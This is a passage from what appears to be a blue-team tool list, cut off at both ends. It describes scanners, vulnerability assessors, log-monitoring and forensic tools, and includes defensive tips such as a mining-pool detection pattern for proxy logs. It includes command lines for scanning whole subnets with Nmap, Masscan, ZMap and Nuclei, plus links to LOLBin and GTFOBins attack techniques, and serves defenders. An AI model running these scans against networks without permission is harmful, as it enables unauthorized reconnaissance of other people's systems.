decoder</i></li> <li><b><a href="#pafish">pafish</a></b><i> Virtual machine sandbox detector</i></li> <li><b><a href="#lookyloo">lookyloo</a></b><i> Phishing domain mapping</i></li> <li><b><a href="#yara">YARA</a></b><i> Malware identification via pattern matching</i></li> <li><b><a href="#cuckoo-sandbox">Cuckoo Sandbox</a></b><i> Malware analysis sandbox</i></li> <li><b><a href="#radare2">Radare2</a></b><i> Reverse engineering framework</i></li> <li><b><a href="#dnspy">dnSpy</a></b><i> .NET debugger and assembly editor</i></li> <li><b><a href="#malware-traffic-analysisnet">malware-traffic-analysis.net</a></b><i> Malware and packet capture samples</i></li> </ul> </ul> </details> <details open> <summary><b>Data Recovery</b> 3 tools</summary> <ul> <ul> <li><b><a href="#recuva">Recuva</a></b><i> File recovery</i></li> <li><b><a href="#extundelete">Extundelete</a></b><i> Ext3 or ext4 partition recovery</i></li> <li><b><a href="#testdisk">TestDisk</a></b><i> Data Recovery</i></li> </ul> </ul> </details> <details open> <summary><b>Digital Forensics</b> 3 tools</summary> <ul> <ul> <li><b><a href="#sans-sift">SANS SIFT</a></b><i> Forensic toolkit</i></li> <li><b><a href="#the-sleuth-kit">The Sleuth Kit</a></b><i> Disk images analysis tools</i></li> <li><b><a href="#autopsy">Autopsy</a></b><i> Digital forensics platform</i></li> </ul> </ul> </details> <details open> <summary><b>Security Awareness Training</b> 3 tools</summary> <ul> <ul> <li><b><a href="#tryhackme">TryHackMe</a></b><i> Cyber security challenges platform</i></li> <li><b><a href="#hackthebox">HackTheBox</a></b><i> Cyber security challenges platform</i></li> <li><b><a href="#phishme">PhishMe</a></b><i> Phishing training</i></li> </ul> </ul> </details> <details open> <summary><b>Communication and Collaboration</b> 2 tools</summary> <ul> <ul> <li><b><a href="#twitter">Twitter</a></b><i> Cyber Security Accounts</i></li> <li><b><a href="#facebook-theatexchange">Facebook TheatExchange</a></b><i> Malicious indicators sharing platform</i></li> </ul> </ul> </details> Blue Team Tips ==================== *Learn from Blue Teamers with a collection of Blue Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your blue teaming abilities.* ### [๐Ÿ”™](#tool-list)Payload extraction with Process Hacker ![image](https://user-images.githubusercontent.com/100603074/217382117-acb26f85-d352-43b3-8818-6c5a0d90f350.png) **Description:** *'Malware Analysis Tip - Use Process Hacker to watch for suspicious .NET assemblies in newly spawned processes. Combined with DnSpy - it's possible to locate and extract malicious payloads without needing to manually de-obfuscate.'* **Credit:** [@embee_research](https://twitter.com/embee_research) **Link:** [Twitter](https://twitter.com/embee_research/status/1614871485931458560) ### [๐Ÿ”™](#tool-list)Prevent Script Execution via Double Click ![image](https://user-images.githubusercontent.com/100603074/218200763-53f9fc80-59e1-468a-93e2-69b84d1c7196.png) **Description:** *On Windows, it's common to see threat actors achieve initial execution via malicious script files masquerading as Microsoft Office files. A nice way to prevent this attack chain is to alter the default application associated with these files (HTA, JS, VBA, VBS) to `notepad.exe`. Now when a user is successfully tricked into clicking a HTA file on disk it will open the script in notepad and execution will not occur*. **Credit:** [bluesoul](https://bluesoul.me/) **Link:** [Blog](https://bluesoul.me/2016/05/12/use-gpo-to-change-the-default-behavior-of-potentially-malicious-file-extensions/) ### [๐Ÿ”™](#tool-list)Detect Cryptojacking Malware with Proxy Logs **Description:** *Cryptojacking malware is becoming more suffisticated, with mining malware leveraging DLL sideloading to hide on machine and reducing CPU load to stay below detection thresholds. One thing they all have in common is they have to make connections to mining pools, this is where we can find them. Monitor your proxy and DNS logs for connections containing common mining pool strings (e.g `*xmr.*` OR `*pool.com` OR `*pool.org` OR `pool.*`).* **Credit:** [Dave Mckay](https://www.howtogeek.com/author/davidmckay/) **Link:** [Blog](https://www.howtogeek.com/devops/how-to-detect-and-defeat-cryptominers-in-your-network/) ### [๐Ÿ”™](#tool-list)Remove null bytes in CyberChef malware analysis ![image](https://user-images.githubusercontent.com/100603074/223865015-00128d71-0093-4422-b271-e26dac723013.png) **Description:** *'After decoding base64 for Unicode string during malware analysis, you may encounter null bytes. Keep your code readable by using the "Remove null bytes" operation in CyberChef'.* **Credit:** [Ayush Anand](https://twitter.com/Securityinbits) **Link:** [Twitter](https://twitter.com/securityinbits/status/1628364983661694976) Network Discovery and Mapping ==================== *Tools for scanning and mapping out the network, discovering devices and services, and identifying potential vulnerabilities.* ### [๐Ÿ”™](#tool-list)[Nmap](https://nmap.org) Nmap (short for Network Mapper) is a free and open-source network scanner tool used to discover hosts and services on a computer network, and to probe for information about their characteristics. It can be used to determine which ports on a network are open and what services are running on those ports. Including the ability to identify security vulnerabilities on the network. **Install:** You can download the latest release from [here](https://nmap.org/download). **Usage:** ```bash # Scan a single IP nmap 192.168.1.1 # Scan a range nmap 192.168.1.1-254 # Scan targets from a file nmap -iL targets.txt # Port scan for port 21 nmap 192.168.1.1 -p 21 # Enables OS detection, version detection, script scanning, and traceroute nmap 192.168.1.1 -A ``` Nice usage [cheat sheet](https://www.stationx.net/nmap-cheat-sheet/). ![image](https://user-images.githubusercontent.com/100603074/210288428-01875d96-72e6-4857-b18d-4e10d80863ad.png) *Image used from https://kirelos.com/nmap-version-scan-determining-the-version-and-available-services/* ### [๐Ÿ”™](#tool-list)[Nuclei](https://nuclei.projectdiscovery.io/nuclei/get-started/) A specialized tool designed to automate the process of detecting vulnerabilities in web applications, networks, and infrastructure. Nuclei uses pre-defined templates to probe a target and identify potential vulnerabilities. It can be used to test a single host or a range of hosts, and can be configured to run a variety of tests to check for different types of vulnerabilities. **Install:** ```bash git clone https://github.com/projectdiscovery/nuclei.git; \ cd nuclei/v2/cmd/nuclei; \ go build; \ mv nuclei /usr/local/bin/; \ nuclei -version; ``` **Usage:** ```bash # All the templates gets executed from default template installation path. nuclei -u https://example.com # Custom template directory or multiple template directory nuclei -u https://example.com -t cves/ -t exposures/ # Templates can be executed against list of URLs nuclei -list http_urls.txt # Excluding single template nuclei -list urls.txt -t cves/ -exclude-templates cves/2020/CVE-2020-XXXX.yaml ``` Full usage information can be found [here](https://nuclei.projectdiscovery.io/nuclei/get-started/#running-nuclei). ![image](https://user-images.githubusercontent.com/100603074/210288448-c2d9da7d-e68f-4d06-9066-b702ce4b5cb3.png) *Image used from https://www.appsecsanta.com/nuclei* ### [๐Ÿ”™](#tool-list)[Masscan]() A port scanner that is similar to nmap, but is much faster and can scan a large number of ports in a short amount of time. Masscan uses a novel technique called "SYN scan" to scan networks, which allows it to scan a large number of ports very quickly. **Install: (Apt)** ```bash sudo apt install masscan ``` **Install: (Git)** ```bash sudo apt-get install clang git gcc make libpcap-dev git clone https://github.com/robertdavidgraham/masscan cd masscan make ``` **Usage:** ```bash # Scan for a selection of ports (-p22,80,445) across a given subnet (192.168.1.0/24) masscan -p22,80,445 192.168.1.0/24 # Scan a class B subnet for ports 22 through 25 masscan 10.11.0.0/16 -p22-25 # Scan a class B subnet for the top 100 ports at 100,000 packets per second masscan 10.11.0.0/16 โ€โ€top-ports 100 โ€“โ€“rate 100000 # Scan a class B subnet, but avoid the ranges in exclude.txt masscan 10.11.0.0/16 โ€โ€top-ports 100 โ€โ€excludefile exclude.txt ``` ![image](https://user-images.githubusercontent.com/100603074/210288465-fa4d7b45-d7ff-4c5e-82a6-e0d480b387c7.png) *Image used from https://kalilinuxtutorials.com/masscan/* ### [๐Ÿ”™](#tool-list)[Angry IP Scanner](https://angryip.org/) A free and open-source tool for scanning IP addresses and ports. It's a cross-platform tool, designed to be fast and easy to use, and can scan an entire network or a range of IP addresses to find live hosts. Angry IP Scanner can also detect the hostname and MAC address of a device, and can be used to perform basic ping sweeps and port scans. **Install:** You can download the latest release from [here](https://angryip.org/download/). **Usage:** Angry IP Scanner can be used via the GUI. Full usage information and documentation can be found [here](https://angryip.org/documentation/). ![image](https://user-images.githubusercontent.com/100603074/210288485-711924ca-504e-4655-9e91-a0ecf32b2e63.png) *Image used from https://angryip.org/screenshots/* ### [๐Ÿ”™](#tool-list)[ZMap](https://github.com/zmap/zmap) ZMap is a network scanner designed to perform comprehensive scans of the IPv4 address space or large portions of it. On a typical desktop computer with a gigabit Ethernet connection, ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. **Install:** You can download the latest release from [here](https://github.com/zmap/zmap/releases). **Usage:** ```bash # Scan only 10.0.0.0/8 and 192.168.0.0/16 on TCP/80 zmap -p 80 10.0.0.0/8 192.168.0.0/16 ``` Full usage information can be found [here](https://github.com/zmap/zmap/wiki). ![image](https://user-images.githubusercontent.com/100603074/210288512-fe050de5-fe7a-4c90-aab3-f307146f2b20.png) *Image used from https://www.hackers-arise.com/post/zmap-for-scanning-the-internet-scan-the-entire-internet-in-45-minutes* ### [๐Ÿ”™](#tool-list)[Shodan]() Shodan is a search engine for internet-connected devices. It crawls the internet for assets, allowing users to search for specific devices and view information about them. This information can include the device's IP address, the software and version it is running, and the type of device it is. **Install:** The search engine can be accessed at [https://www.shodan.io/dashboard](https://www.shodan.io/dashboard). **Usage:** [Shodan query fundamentals](https://help.shodan.io/the-basics/search-query-fundamentals) [Shodan query examples](https://www.shodan.io/search/examples) [Nice query cheatsheet](https://www.osintme.com/index.php/2021/01/16/ultimate-osint-with-shodan-100-great-shodan-queries/) ![image](https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png) *Image used from https://www.shodan.io/* Vulnerability Management ==================== *Tools for identifying, prioritizing, and mitigating vulnerabilities in the network and on individual devices.* ### [๐Ÿ”™](#tool-list)[OpenVAS](https://openvas.org/) OpenVAS is an open-source vulnerability scanner that helps identify security vulnerabilities in software and networks. It is a tool that can be used to perform network security assessments and is often used to identify vulnerabilities in systems and applications so that they can be patched or mitigated. OpenVAS is developed by the Greenbone Networks company and is available as a free and open-source software application. **Install: (Kali)** ```bash apt-get update apt-get dist-upgrade apt-get install openvas openvas-setup ``` **Usage:** ```bash openvas-start ``` Visit https://127.0.0.1:9392, accept the SSL certificate popup and login with admin credentials: - username:admin - password:(*Password in openvas-setup command output*) ![image](https://user-images.githubusercontent.com/100603074/210452918-aa8d7be0-e557-4556-937c-334df02702dc.png) *Image used from https://www.kali.org/blog/openvas-vulnerability-scanning/* ### [๐Ÿ”™](#tool-list)[Nessus Essentials](https://www.tenable.com/products/nessus/nessus-essentials) Nessus is a vulnerability scanner that helps identify and assess the vulnerabilities that exist within a network or computer system. It is a tool that is used to perform security assessments and can be used to identify vulnerabilities in systems and applications so that they can be patched or mitigated. Nessus is developed by Tenable, Inc. and is available in both free and paid versions: - The free version, called Nessus Essentials, is available for personal use only and is limited in its capabilities compared to the paid version. - The paid version, called Nessus Professional, is more fully featured and is intended for use in a professional setting. **Install:** Register for a Nessus Essentials activation code [here](https://www.tenable.com/products/nessus/nessus-essentials) and download. Purchase Nessus Professional from [here](https://www.tenable.com/products/nessus/nessus-professional). **Usage:** Extensive documentation can be found [here](https://docs.tenable.com/nessus/Content/GetStarted.htm). [Nessus Plugins Search](https://www.tenable.com/plugins/search) [Tenable Community](https://community.tenable.com/) ![image](https://user-images.githubusercontent.com/100603074/210452954-6208f96a-d180-4c8d-9579-313613d2cbe2.png) *Image used from https://www.tenable.com* ### [๐Ÿ”™](#tool-list)[Nexpose](https://www.rapid7.com/products/nexpose/) Nexpose is a vulnerability management tool developed by Rapid7. It is designed to help organizations identify and assess vulnerabilities in their systems and applications in order to mitigate risk and improve security. Nexpose can be used to scan networks, devices, and applications in order to identify vulnerabilities and provide recommendations for remediation. It also offers features such as asset discovery, risk prioritization, and integration with other tools in the Rapid7 vulnerability management platform. **Install:** For detailed installation instructions see [here](https://docs.rapid7.com/nexpose/install/). **Usage:** For full login information see [here](https://docs.rapid7.com/nexpose/log-in-and-activate). For usage and scan creation instructions see [here](https://docs.rapid7.com/nexpose/create-and-scan-a-site). ![image](https://user-images.githubusercontent.com/100603074/210452992-cf9976ee-6b93-465d-bc1c-6e23cc387dba.png) *Image used from https://www.rapid7.com/products/nexpose/* ### [๐Ÿ”™](#tool-list)[HackerOne](https://www.hackerone.com/) HackerOne is a bug bounty management company that can be used to create and manage bug bounty programs for your business. Bug bounty programs are a great way to outsource external vulnerability assessments, with the platform offering both private and public programs with the ability set program scopes and rules of engagement. HackerOne also offer initial triage and management of external bug reports from researchers, with the ability to compensate researchers directly through the platform. ![image](https://user-images.githubusercontent.com/100603074/217382232-b8df098a-c74b-4552-b344-f5228c84c383.png) *Image used from https://www.hackerone.com/product/bug-bounty-platform* Security Monitoring ==================== *Tools for collecting and analyzing security logs and other data sources to identify potential threats and anomalous activity.* ### [๐Ÿ”™](#tool-list)[Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon) Sysmon is a Windows system monitor that tracks system activity and logs it to the Windows event log. It provides detailed information about system activity, including process creation and termination, network connections, and changes to file creation time. Sysmon can be configured to monitor specific events or processes and can be used to alert administrators of suspicious activity on a system. **Install:** Download the sysmon binary from [here](https://download.sysinternals.com/files/Sysmon.zip). **Usage:** ```bash # Install with default settings (process images hashed with SHA1 and no network monitoring) sysmon -accepteula -i # Install Sysmon with a configuration file (as described below) sysmon -accepteula -i c:\windows\config.xml # Uninstall sysmon -u # Dump the current configuration sysmon -c ``` Full event filtering information can be found [here](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-filtering-entries). The Microsoft documentation page can be found [here](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon). ![image](https://user-images.githubusercontent.com/100603074/210621009-b3c31c2b-f789-450a-acbf-7578fa943abd.png) *Image used from https://nsaneforums.com/topic/281207-sysmon-5-brings-registry-modification-logging/* ### [๐Ÿ”™](#tool-list)[Kibana](https://www.elastic.co/kibana/) Kibana is an open-source data visualization and exploration tool that is often used for log analysis in combination with Elasticsearch. Kibana provides a user-friendly interface for searching, visualizing, and analyzing log data, which can be helpful for identifying patterns and trends that may indicate a security threat. Kibana can be used to analyze a wide range of data sources, including system logs, network logs, and application logs. It can also be used to create custom dashboards and alerts to help security teams stay informed about potential threats and respond quickly to incidents. **Install:** You can download Kibana from [here](https://www.elastic.co/downloads/kibana). Installation instructions can be found [here](https://www.elastic.co/guide/en/kibana/current/install.html). **Usage: (Visualize and explore log data)** Kibana provides a range of visualization tools that can help you identify patterns and trends in your log data. You can use these tools to create custom dashboards that display relevant metrics and alerts. **Usage: (Threat Alerting)** Kibana can be configured to send alerts when it detects certain patterns or anomalies in your log data. You can set up alerts to notify you of potential security threats, such as failed login attempts or network connections to known malicious IP addresses. Nice [blog](https://phoenixnap.com/kb/kibana-tutorial) about querying and visualizing data in Kibana. ![image](https://user-images.githubusercontent.com/100603074/210621061-badf3acf-2680-42c5-bbd9-43bca7a85cf2.png) *Image used from https://www.pinterest.co.uk/pin/analysing-honeypot-data-using-kibana-and-elasticsearch--684758318328369269/* ### [๐Ÿ”™](#tool-list)[Logstash](https://www.elastic.co/logstash/) Logstash is a open-source data collection engine with real-time pipelining capabilities. It is a server-side data processing pipeline that ingests data from a multitude of sources simultaneously, transforms it, and then sends it to a "stash" like Elasticsearch. Logstash has a rich set of plugins, which allows it to connect to a variety of sources and process the data in multiple ways. It can parse and transform logs, translate data into a structured format, or send it to another tool for further processing. With its ability to process large volumes of data quickly, Logstash is an integral part of the ELK stack (Elasticsearch, Logstash, and Kibana) and is often used to centralize, transform, and monitor log data. **Install:** Download logstash from [here](https://www.elastic.co/downloads/logstash). **Usage:** Full logstash documentation [here](https://www.elastic.co/guide/en/logstash/current/introduction.html). Configuration examples [here](https://www.elastic.co/guide/en/logstash/current/config-examples.html). ![image](https://user-images.githubusercontent.com/100603074/210621111-e7630493-bc1c-41fa-af98-0261fbf6e293.png) *Image used from https://www.elastic.co/guide/en/logstash/current/logstash-modules.html* ### [๐Ÿ”™](#tool-list)[parsedmarc](https://github.com/domainaware/parsedmarc) A Python module and CLI utility for parsing DMARC reports. When used with Elasticsearch and Kibana (or Splunk), it works as a self-hosted open source alternative to commercial DMARC report processing services such as Agari Brand Protection, Dmarcian, OnDMARC, ProofPoint Email Fraud Defense, and Valimail. Features: - Parses draft and 1.0 standard aggregate/rua reports - Parses forensic/failure/ruf reports - Can parse reports from an inbox over IMAP, Microsoft Graph, or Gmail API - Transparently handles gzip or zip compressed reports - Consistent data structures - Simple JSON and/or CSV output - Optionally email the results - Optionally send the results to Elasticsearch and/or Splunk, for use with premade dashboards - Optionally send reports to Apache Kafka ![image](https://user-images.githubusercontent.com/100603074/217382301-064ac450-3690-469d-9c86-c2e3c6cdeca9.png) *Image used from https://github.com/domainaware/parsedmarc* ### [๐Ÿ”™](#tool-list)[Phishing Catcher](https://github.com/x0rz/phishing_catcher) As a business, phishing can cause reputational and financial damage to you and your customers. Being able to proactively identify phishing infrastructure targeting your business helps to reduce the risk of these damages. Phish catcher allows you to catch possible phishing domains in near real time by looking for suspicious TLS certificate issuances reported to the Certificate Transparency Log (CTL) via the CertStream API. "Suspicious" issuances are those whose domain name scores beyond a certain threshold based on a configuration file. ![image](https://user-images.githubusercontent.com/100603074/217382453-400a044b-720d-47ce-adff-0a23e5511ae1.png) *Image used from https://github.com/x0rz/phishing_catcher* ### [๐Ÿ”™](#tool-list)[maltrail](https://github.com/stamparm/maltrail) Maltrail is a malicious traffic detection system, utilizing publicly available lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists. A trail can be anything from domain name, URL, IP address or HTTP User-Agent header value. A demo page for this tool can be found [here](https://maltraildemo.github.io/). **Install:** ```bash sudo apt-get install git python3 python3-dev python3-pip python-is-python3 libpcap-dev build-essential procps schedtool sudo pip3 install pcapy-ng git clone --depth 1 https://github.com/stamparm/maltrail.git cd maltrail ``` **Usage:** ```bash sudo python3 sensor.py ``` ![image](https://user-images.githubusercontent.com/100603074/217382540-fa1283d7-9825-4529-a92f-11f447e4657b.png) *Image used from https://github.com/stamparm/maltrail* ### [๐Ÿ”™](#tool-list)[AutorunsToWinEventLog](https://github.com/palantir/windows-event-forwarding/tree/master/AutorunsToWinEventLog) Autoruns is a tool developed by Sysinternals that allows you to view all of the locations in Windows where applications can insert themselves to launch at boot or when certain applications are opened. Malware often takes advantages of these locations to ensure that it runs whenever your computer boots up. Autoruns conveniently includes a non-interactive command line utility. This code generates a CSV of Autoruns entries, converts them to JSON, and finally inserts them into a custom Windows Event Log. By doing this, we can take advantage of our existing WEF infrastructure to get these entries into our SIEM and start looking for signs of malicious persistence on endpoints and servers. **Install:** Download [AutorunsToWinEventLog](https://github.com/palantir/windows-event-forwarding/tree/master/AutorunsToWinEventLog). **Usage:** From an Admin Powershell console run `.\Install.ps1` This script does the following: - Creates the directory structure at c:\Program Files\AutorunsToWinEventLog - Copies over AutorunsToWinEventLog.ps1 to that directory - Downloads Autorunsc64.exe from https://live.sysinternals.com - Sets up a scheduled task to run the script daily @ 11am ![image](https://user-images.githubusercontent.com/100603074/218199447-40e7add1-68ee-44e2-a297-3bf03c977a9c.png) *Image used from https://www.detectionlab.network/usage/autorunstowineventlog/* ### [๐Ÿ”™](#tool-list)[procfilter](https://github.com/godaddy/procfilter) ProcFilter is a process filtering system for Windows with built-in [YARA](https://github.com/virustotal/yara) integration. YARA rules can be instrumented with custom meta tags that tailor its response to rule matches. It runs as a Windows service and is integrated with [Microsoft's ETW API](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968803%28v=vs.85%29.aspx), making results viewable in the Windows Event Log. Installation, activation, and removal can be done dynamically and does not require a reboot. ProcFilter's intended use is for malware analysts to be able to create YARA signatures that protect their Windows environments against a specific threat. It does not include a large signature set. Think lightweight, precise, and targeted rather than broad or all-encompassing. ProcFilter is also intended for use in controlled analysis environments where custom plugins can perform artifact-specific actions. **Install:** [ProcFilter x86/x64 Release/Debug Installers](https://github.com/godaddy/procfilter/releases) *Note: Unpatched Windows 7 systems require hotfix 3033929 to load the driver component. More information can be found here.* Nice configuration template file [here](https://github.com/godaddy/procfilter/blob/master/files/procfilter.ini). **Usage:** ``` procfilter -start ``` Usage screenshots can be found [here](https://github.com/godaddy/procfilter#screenshots). ![image](https://user-images.githubusercontent.com/100603074/218200282-f2465b93-169a-43d6-8e12-dea61ed9272c.png) *Image used from https://github.com/godaddy/procfilter* ### [๐Ÿ”™](#tool-list)[velociraptor](https://github.com/Velocidex/velociraptor) Velociraptor is a unique, advanced open-source endpoint monitoring, digital forensic and cyber response platform. It was developed by Digital Forensic and Incident Response (DFIR) professionals who needed a powerful and efficient way to hunt for specific artifacts and monitor activities across fleets of endpoints. Velociraptor provides you with the ability to more effectively respond to a wide range of digital forensic and cyber incident response investigations and data breaches: Features: - Reconstruct attacker activities through digital forensic analysis - Hunt for evidence of sophisticated adversaries - Investigate malware outbreaks and other suspicious network activities - Monitory continuously for suspicious user activities, such as files copied to USB devices - Discover whether disclosure of confidential information occurred outside the network - Gather endpoint data over time for use in threat hunting and future investigations **Install:** Download the binary from the [release page](https://github.com/Velocidex/velociraptor/releases). **Usage:** ``` velociraptor gui ``` Full usage information can be found [here](https://docs.velociraptor.app/). ![image](https://user-images.githubusercontent.com/100603074/218200327-3f5ab599-11f1-46dc-8f28-b27c1258224a.png) *Image used from https://docs.velociraptor.app* ### [๐Ÿ”™](#tool-list)[SysmonSearch](https://github.com/JPCERTCC/SysmonSearch) SysmonSearch makes event log analysis more effective and less time consuming, by aggregating event logs generated by Microsoft's Sysmon. SysmonSearch uses Elasticserach and Kibana (and Kibana plugin). * **Elasticserach** Elasticsearch collects/stores Sysmon's event log. * **Kibana** Kibana provides user interface for your Sysmon's event log analysis. The following functions are implemented as Kibana plugin. * Visualizes Function This function visualizes Sysmon's event logs to illustrate correlation of processes and networks. * Statistical Function This function collects the statistics of each device or Sysmon's event ID. * Monitor Function This function monitor incoming logs based on the preconfigured rules, and trigers alert. * **StixIoC server** You can add search/monitor condition by uploading STIX/IOC file. From StixIoC server Web UI, you can upload STIXv1, STIXv2 and OpenIOC format files. **Install: (Linux)** ```bash git clone https://github.com/JPCERTCC/SysmonSearch.git ``` [Modify Elasticsearch configuration](https://github.com/JPCERTCC/SysmonSearch/wiki/Install#elasticsearch-server-setup) [Modify Kibana configuration](https://github.com/JPCERTCC/SysmonSearch/wiki/Install#kibana-server-setup) Full installation instructions can be found [here](https://github.com/JPCERTCC/SysmonSearch/wiki/Install). **Usage:** *Once Elasticsearch and Kibana configurations have been modified, restart the services and navigate to your Kibana interface. The SysmonSearch ribbon should be visible.* [Visualize the Sysmon log to investigate suspicious behavior](https://blogs.jpcert.or.jp/ja/2018/09/SysmonSearch.html) ![image](https://user-images.githubusercontent.com/100603074/218200383-84e4c9f4-3e34-4973-b37c-a9160a74b5e0.png) *Image used from https://blogs.jpcert.or.jp/ja/2018/09/SysmonSearch.html* Threat Tools and Techniques ==================== *Tools for identifying and implementing detections against TTPs used by threat actors.* ### [๐Ÿ”™](#tool-list)[lolbas-project.github.io](https://lolbas-project.github.io/) Living off the land binaries (LOLBins) are legitimate Windows executables that can be used by threat actors to carry out malicious activities without raising suspicion. Using LOLBins allows attackers to blend in with normal system activity and evade detection, making them a popular choice for malicious actors. The LOLBAS project is a MITRE mapped list of LOLBINS with commands, usage and detection information for defenders. Visit [https://lolbas-project.github.io/](https://lolbas-project.github.io/). **Usage:** Use the information for detection opportunities to harden your infrastructure against LOLBIN usage. Here are some project links to get started: - [Bitsadmin.exe](https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/) - [Certutil.exe](https://lolbas-project.github.io/lolbas/Binaries/Certutil/) - [Cscript.exe](https://lolbas-project.github.io/lolbas/Binaries/Cscript/) ![image](https://user-images.githubusercontent.com/100603074/210625466-9ab87233-e822-4961-a68a-f863f56ef830.png) *Image used from https://lolbas-project.github.io/* ### [๐Ÿ”™](#tool-list)[gtfobins.github.io](https://gtfobins.github.io/) GTFOBins (short for "Get The F* Out Binaries") is a collection of Unix binaries that can be used to escalate privileges, bypass restrictions, or execute arbitrary commands on a system. They can be used by threat actors to gain unauthorized access to systems and carry out malicious activities. The GTFOBins project is a list of Unix binaries with command and usage information for attackers. This information can be used to implement unix detections. Visit [https://gtfobins.github.io/](https://gtfobins.github.io/). **Usage:** Here are some project links to get started: - [base64](https://gtfobins.github.io/gtfobins/base64/) - [curl](https://gtfobins.github.io/gtfobins/curl/) - [nano](https://gtfobins.github.io/gtfobins/nano/) ![image](https://user-images.githubusercontent.com/100603074/210625527-6a037b81-e3fe-4282-a193-1cc4b9c06f75.png) *Image used from https://gtfobins.github.io/* ### [๐Ÿ”™](#tool-list)[filesec.io](https://filesec.io/) Filesec is a list of file extensions that can be used by attackers for phishing, execution, macros etc. This is a nice resource to understand the malicious use cases of common file extentions and ways that you can defend against them. Each file extension page contains a description, related operating system and recommendations. Visit [https://filesec.io/](https://filesec.io/). **Usage:** Here are some project links to get started: - [.Docm](https://filesec.io/docm) - [.Iso](https://filesec.io/iso) - [.Ppam](https://filesec.io/ppam) ![image](https://user-images.githubusercontent.com/100603074/210625626-58223992-2821-42c6-878a-e6aea4b9a508.png) *Image used from https://filesec.io/* ### [๐Ÿ”™](#tool-list)[KQL Search](https://www.kqlsearch.com/) KQL stands for "Kusto Query Language", and it is a query language used to search and filter data in Azure Monitor logs. It is similar to SQL, but is more optimized for log analytics and time-series data. KQL query language is particularly useful for blue teamers because it allows you to quickly and easily search through large volumes of log data to identify security events and anomalies that may indicate a threat. KQL Search is a web app created by [@ugurkocde](https://twitter.com/ugurkocde) that aggregates KQL queries that are shared on GitHub. You can visit the site at [https://www.kqlsearch.com/](https://www.kqlsearch.com/). More information about Kusto Query Language (KQL) can be found [here](https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/). ![image](https://user-images.githubusercontent.com/100603074/210736862-1e0cf987-7c85-40c1-b51c-1f3a1f946f7d.png) *Image used from https://www.kqlsearch.com/* ### [๐Ÿ”™](#tool-list)[Unprotect Project](https://unprotect.it/about/) Malware authors spend a great deal of time and effort to develop complex code to perform malicious actions against a target system. It is crucial for malware to remain undetected and avoid sandbox analysis, antiviruses or malware analysts. With this kind of technics, malware are able to pass under the radar and stay undetected on a system. The goal of this free database is to centralize the information about malware evasion techniques. The project aims to provide Malware Analysts and Defenders with actionable insights and detection capabilities to shorten their response times. The project can be found at [https://unprotect.it/](https://unprotect.it/). The project has an API - Docs [here](https://unprotect.it/api/). ![image](https://user-images.githubusercontent.com/100603074/210743650-6adaddce-ecb3-41bb-854b-292482b73d55.png) *Image used from https://unprotect.it/map/* ### [๐Ÿ”™](#tool-list)[chainsaw](https://github.com/WithSecureLabs/chainsaw) Chainsaw provides a powerful โ€˜first-responseโ€™ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and MFTs. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules. Features: - Hunt for threats using Sigma detection rules and custom Chainsaw detection rules - Search and extract forensic artefacts by string matching, and regex patterns - Lightning fast, written in rust, wrapping the EVTX parser library by @OBenamram - Clean and lightweight execution and output formats without unnecessary bloat - Document tagging (detection logic matching) provided by the TAU Engine Library - Output results in a variety of formats, such as ASCII table format, CSV format, and JSON format - Can be run on MacOS, Linux and Windows **Install:** ```bash git clone https://github.com/countercept/chainsaw.git cargo build --release git clone https://github.com/SigmaHQ/sigma git clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git ``` **Usage:** ```bash ./chainsaw hunt EVTX-ATTACK-SAMPLES/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml ``` ![image](https://user-images.githubusercontent.com/100603074/217382675-1834c13d-1789-4ea7-a46e-25808477bcf0.png) *Image used from https://twitter.com/FranticTyping/status/1433386064429916162/* ### [๐Ÿ”™](#tool-list)[freq](https://github.com/MarkBaggett/freq) Adversaries attempt to bypass signature based/pattern matching/blacklist techniques by introducing random: filenames, service names, workstation names, domains, hostnames, SSL cert subjects and issuer subjects, etc. Freq is a python API designed by Mark Baggett to handle mass entropy testing. It was designed to be used in conjunction with a SIEM solutions but can work with anything that can submit a web request. The tool uses frequency tables that map how likely one character will follow another **Install:** ```bash git clone https://github.com/MarkBaggett/freq cd freq ``` **Usage:** ```bash # Running freq_server.py on port 10004 and using a frequency table of /opt/freq/dns.freq /usr/bin/python /opt/freq/freq_server.py 10004 /opt/freq/dns.freq ``` ### [๐Ÿ”™](#tool-list)[yarGen](https://github.com/Neo23x0/yarGen) yarGen is a generator for YARA rules The main principle is the creation of yara rules from strings found in malware files while removing all strings that also appear in goodware files. Therefore yarGen includes a big goodware strings and opcode database as ZIP archives that have to be extracted before the first use. The rule generation process also tries to identify similarities between the files that get analyzed and then combines the strings to so called super rules. The super rule generation does not remove the simple rule for the files that have been combined in a single super rule. This means that there is some redundancy when super rules are created. You can suppress a simple rule for a file that was already covered by super rule by using --nosimple. **Install:** Download the latest [release](https://github.com/Neo23x0/yarGen/releases). ```bash pip install -r requirements.txt python yarGen.py --update ``` **Usage:** ```bash # Create a new strings and opcodes database from an Office 2013 program directory yarGen.py -c --opcodes -i office -g /opt/packs/office2013 # Update the once created databases with the "-u" parameter yarGen.py -u --opcodes -i office -g /opt/packs/office365 ``` Usage examples can be found [here](https://github.com/Neo23x0/yarGen#examples). ![image](https://user-images.githubusercontent.com/100603074/218200487-8476950d-c63e-4d5a-a03c-f2969b6001cc.png) *Image used from https://github.com/Neo23x0/yarGen* ### [๐Ÿ”™](#tool-list)[EmailAnalyzer](https://github.com/keraattin/EmailAnalyzer) With EmailAnalyzer you can able to analyze your suspicious emails. You can extract headers, links and hashes from the .eml file **Install:** ```bash git clone https://github.com/keraattin/EmailAnalyzer cd EmailAnalyzer ``` **Usage:** ```bash # View headers in eml file python3 email-analyzer.py -f <eml file> --headers # Get hashes python3 email-analyzer.py -f <eml file> --digests # Get links python3 email-analyzer.py -f <eml file> --links # Get attachments python3 email-analyzer.py 